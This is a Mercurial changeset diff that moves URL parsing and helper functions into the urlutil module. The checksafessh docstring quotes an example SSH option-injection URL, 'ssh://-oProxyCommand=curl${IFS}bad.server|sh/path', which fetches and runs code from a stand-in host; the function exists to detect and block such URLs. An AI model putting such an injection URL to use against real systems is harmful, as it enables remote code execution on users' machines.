Mercurial > public > mercurial-scm > hg-stable
diff mercurial/utils/urlutil.py @ 46907:ffd3e823a7e5
urlutil: extract `url` related code from `util` into the new module
The new module is well fitting for this new code. And this will be useful to
make the gathered code collaborate more later.
Differential Revision: https://phab.mercurial-scm.org/D10374
author | Pierre-Yves David <pierre-yves.david@octobus.net> |
---|---|
date | Mon, 12 Apr 2021 03:01:04 +0200 |
parents | 33524c46a092 |
children | 4452cb788404 |
line wrap: on
line diff
--- a/mercurial/utils/urlutil.py Sun Apr 11 23:54:35 2021 +0200 +++ b/mercurial/utils/urlutil.py Mon Apr 12 03:01:04 2021 +0200 @@ -5,6 +5,8 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. import os +import re as remod +import socket from ..i18n import _ from ..pycompat import ( @@ -12,12 +14,437 @@ setattr, ) from .. import ( + encoding, error, pycompat, - util, + urllibcompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Union, + ) + +urlreq = urllibcompat.urlreq + + +def getport(port): + # type: (Union[bytes, int]) -> int + """Return the port for a given network service. + + If port is an integer, it's returned as is. If it's a string, it's + looked up using socket.getservbyname(). If there's no matching + service, error.Abort is raised. + """ + try: + return int(port) + except ValueError: + pass + + try: + return socket.getservbyname(pycompat.sysstr(port)) + except socket.error: + raise error.Abort( + _(b"no port number associated with service '%s'") % port + ) + + +class url(object): + r"""Reliable URL parser. + + This parses URLs and provides attributes for the following + components: + + <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> + + Missing components are set to None. The only exception is + fragment, which is set to '' if present but empty. + + If parsefragment is False, fragment is included in query. If + parsequery is False, query is included in path. If both are + False, both fragment and query are included in path. + + See http://www.ietf.org/rfc/rfc2396.txt for more information. + + Note that for backward compatibility reasons, bundle URLs do not + take host names. That means 'bundle://../' has a path of '../'. + + Examples: + + >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') + <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> + >>> url(b'ssh://[::1]:2200//home/joe/repo') + <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> + >>> url(b'file:///home/joe/repo') + <url scheme: 'file', path: '/home/joe/repo'> + >>> url(b'file:///c:/temp/foo/') + <url scheme: 'file', path: 'c:/temp/foo/'> + >>> url(b'bundle:foo') + <url scheme: 'bundle', path: 'foo'> + >>> url(b'bundle://../foo') + <url scheme: 'bundle', path: '../foo'> + >>> url(br'c:\foo\bar') + <url path: 'c:\\foo\\bar'> + >>> url(br'\\blah\blah\blah') + <url path: '\\\\blah\\blah\\blah'> + >>> url(br'\\blah\blah\blah#baz') + <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> + >>> url(br'file:///C:\users\me') + <url scheme: 'file', path: 'C:\\users\\me'> + + Authentication credentials: + + >>> url(b'ssh://joe:xyz@x/repo') + <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> + >>> url(b'ssh://joe@x/repo') + <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> + + Query strings and fragments: + + >>> url(b'http://host/a?b#c') + <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> + >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) + <url scheme: 'http', host: 'host', path: 'a?b#c'> + + Empty path: + + >>> url(b'') + <url path: ''> + >>> url(b'#a') + <url path: '', fragment: 'a'> + >>> url(b'http://host/') + <url scheme: 'http', host: 'host', path: ''> + >>> url(b'http://host/#a') + <url scheme: 'http', host: 'host', path: '', fragment: 'a'> + + Only scheme: + + >>> url(b'http:') + <url scheme: 'http'> + """ + + _safechars = b"!~*'()+" + _safepchars = b"/!~*'()+:\\" + _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match + + def __init__(self, path, parsequery=True, parsefragment=True): + # type: (bytes, bool, bool) -> None + # We slowly chomp away at path until we have only the path left + self.scheme = self.user = self.passwd = self.host = None + self.port = self.path = self.query = self.fragment = None + self._localpath = True + self._hostport = b'' + self._origpath = path + + if parsefragment and b'#' in path: + path, self.fragment = path.split(b'#', 1) + + # special case for Windows drive letters and UNC paths + if hasdriveletter(path) or path.startswith(b'\\\\'): + self.path = path + return + + # For compatibility reasons, we can't handle bundle paths as + # normal URLS + if path.startswith(b'bundle:'): + self.scheme = b'bundle' + path = path[7:] + if path.startswith(b'//'): + path = path[2:] + self.path = path + return + + if self._matchscheme(path): + parts = path.split(b':', 1) + if parts[0]: + self.scheme, path = parts + self._localpath = False + + if not path: + path = None + if self._localpath: + self.path = b'' + return + else: + if self._localpath: + self.path = path + return + + if parsequery and b'?' in path: + path, self.query = path.split(b'?', 1) + if not path: + path = None + if not self.query: + self.query = None + + # // is required to specify a host/authority + if path and path.startswith(b'//'): + parts = path[2:].split(b'/', 1) + if len(parts) > 1: + self.host, path = parts + else: + self.host = parts[0] + path = None + if not self.host: + self.host = None + # path of file:///d is /d + # path of file:///d:/ is d:/, not /d:/ + if path and not hasdriveletter(path): + path = b'/' + path + + if self.host and b'@' in self.host: + self.user, self.host = self.host.rsplit(b'@', 1) + if b':' in self.user: + self.user, self.passwd = self.user.split(b':', 1) + if not self.host: + self.host = None + + # Don't split on colons in IPv6 addresses without ports + if ( + self.host + and b':' in self.host + and not ( + self.host.startswith(b'[') and self.host.endswith(b']') + ) + ): + self._hostport = self.host + self.host, self.port = self.host.rsplit(b':', 1) + if not self.host: + self.host = None + + if ( + self.host + and self.scheme == b'file' + and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') + ): + raise error.Abort( + _(b'file:// URLs can only refer to localhost') + ) + + self.path = path + + # leave the query string escaped + for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): + v = getattr(self, a) + if v is not None: + setattr(self, a, urlreq.unquote(v)) + + def copy(self): + u = url(b'temporary useless value') + u.path = self.path + u.scheme = self.scheme + u.user = self.user + u.passwd = self.passwd + u.host = self.host + u.path = self.path + u.query = self.query + u.fragment = self.fragment + u._localpath = self._localpath + u._hostport = self._hostport + u._origpath = self._origpath + return u + + @encoding.strmethod + def __repr__(self): + attrs = [] + for a in ( + b'scheme', + b'user', + b'passwd', + b'host', + b'port', + b'path', + b'query', + b'fragment', + ): + v = getattr(self, a) + if v is not None: + attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) + return b'<url %s>' % b', '.join(attrs) + + def __bytes__(self): + r"""Join the URL's components back into a URL string. + + Examples: + + >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) + 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) + 'http://user:pw@host:80/?foo=bar&baz=42' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) + 'http://user:pw@host:80/?foo=bar%3dbaz' + >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) + 'ssh://user:pw@[::1]:2200//home/joe#' + >>> bytes(url(b'http://localhost:80//')) + 'http://localhost:80//' + >>> bytes(url(b'http://localhost:80/')) + 'http://localhost:80/' + >>> bytes(url(b'http://localhost:80')) + 'http://localhost:80/' + >>> bytes(url(b'bundle:foo')) + 'bundle:foo' + >>> bytes(url(b'bundle://../foo')) + 'bundle:../foo' + >>> bytes(url(b'path')) + 'path' + >>> bytes(url(b'file:///tmp/foo/bar')) + 'file:///tmp/foo/bar' + >>> bytes(url(b'file:///c:/tmp/foo/bar')) + 'file:///c:/tmp/foo/bar' + >>> print(url(br'bundle:foo\bar')) + bundle:foo\bar + >>> print(url(br'file:///D:\data\hg')) + file:///D:\data\hg + """ + if self._localpath: + s = self.path + if self.scheme == b'bundle': + s = b'bundle:' + s + if self.fragment: + s += b'#' + self.fragment + return s + + s = self.scheme + b':' + if self.user or self.passwd or self.host: + s += b'//' + elif self.scheme and ( + not self.path + or self.path.startswith(b'/') + or hasdriveletter(self.path) + ): + s += b'//' + if hasdriveletter(self.path): + s += b'/' + if self.user: + s += urlreq.quote(self.user, safe=self._safechars) + if self.passwd: + s += b':' + urlreq.quote(self.passwd, safe=self._safechars) + if self.user or self.passwd: + s += b'@' + if self.host: + if not (self.host.startswith(b'[') and self.host.endswith(b']')): + s += urlreq.quote(self.host) + else: + s += self.host + if self.port: + s += b':' + urlreq.quote(self.port) + if self.host: + s += b'/' + if self.path: + # TODO: similar to the query string, we should not unescape the + # path when we store it, the path might contain '%2f' = '/', + # which we should *not* escape. + s += urlreq.quote(self.path, safe=self._safepchars) + if self.query: + # we store the query in escaped form. + s += b'?' + self.query + if self.fragment is not None: + s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) + return s + + __str__ = encoding.strmethod(__bytes__) + + def authinfo(self): + user, passwd = self.user, self.passwd + try: + self.user, self.passwd = None, None + s = bytes(self) + finally: + self.user, self.passwd = user, passwd + if not self.user: + return (s, None) + # authinfo[1] is passed to urllib2 password manager, and its + # URIs must not contain credentials. The host is passed in the + # URIs list because Python < 2.4.3 uses only that to search for + # a password. + return (s, (None, (s, self.host), self.user, self.passwd or b'')) + + def isabs(self): + if self.scheme and self.scheme != b'file': + return True # remote URL + if hasdriveletter(self.path): + return True # absolute for our purposes - can't be joined() + if self.path.startswith(br'\\'): + return True # Windows UNC path + if self.path.startswith(b'/'): + return True # POSIX-style + return False + + def localpath(self): + # type: () -> bytes + if self.scheme == b'file' or self.scheme == b'bundle': + path = self.path or b'/' + # For Windows, we need to promote hosts containing drive + # letters to paths with drive letters. + if hasdriveletter(self._hostport): + path = self._hostport + b'/' + self.path + elif ( + self.host is not None and self.path and not hasdriveletter(path) + ): + path = b'/' + path + return path + return self._origpath + + def islocal(self): + '''whether localpath will return something that posixfile can open''' + return ( + not self.scheme + or self.scheme == b'file' + or self.scheme == b'bundle' + ) + + +def hasscheme(path): + # type: (bytes) -> bool + return bool(url(path).scheme) # cast to help pytype + + +def hasdriveletter(path): + # type: (bytes) -> bool + return bool(path) and path[1:2] == b':' and path[0:1].isalpha() + + +def urllocalpath(path): + # type: (bytes) -> bytes + return url(path, parsequery=False, parsefragment=False).localpath() + + +def checksafessh(path): + # type: (bytes) -> None + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + path = urlreq.unquote(path) + if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): + raise error.Abort( + _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) + ) + + +def hidepassword(u): + # type: (bytes) -> bytes + '''hide user credential in a url string''' + u = url(u) + if u.passwd: + u.passwd = b'***' + return bytes(u) + + +def removeauth(u): + # type: (bytes) -> bytes + '''remove all authentication information from a url string''' + u = url(u) + u.user = u.passwd = None + return bytes(u) + + class paths(dict): """Represents a collection of paths and their configs. @@ -103,7 +530,7 @@ @pathsuboption(b'pushurl', b'pushloc') def pushurlpathoption(ui, path, value): - u = util.url(value) + u = url(value) # Actually require a URL. if not u.scheme: ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) @@ -148,7 +575,7 @@ raise ValueError(b'rawloc must be defined') # Locations may define branches via syntax <base>#<branch>. - u = util.url(rawloc) + u = url(rawloc) branch = None if u.fragment: branch = u.fragment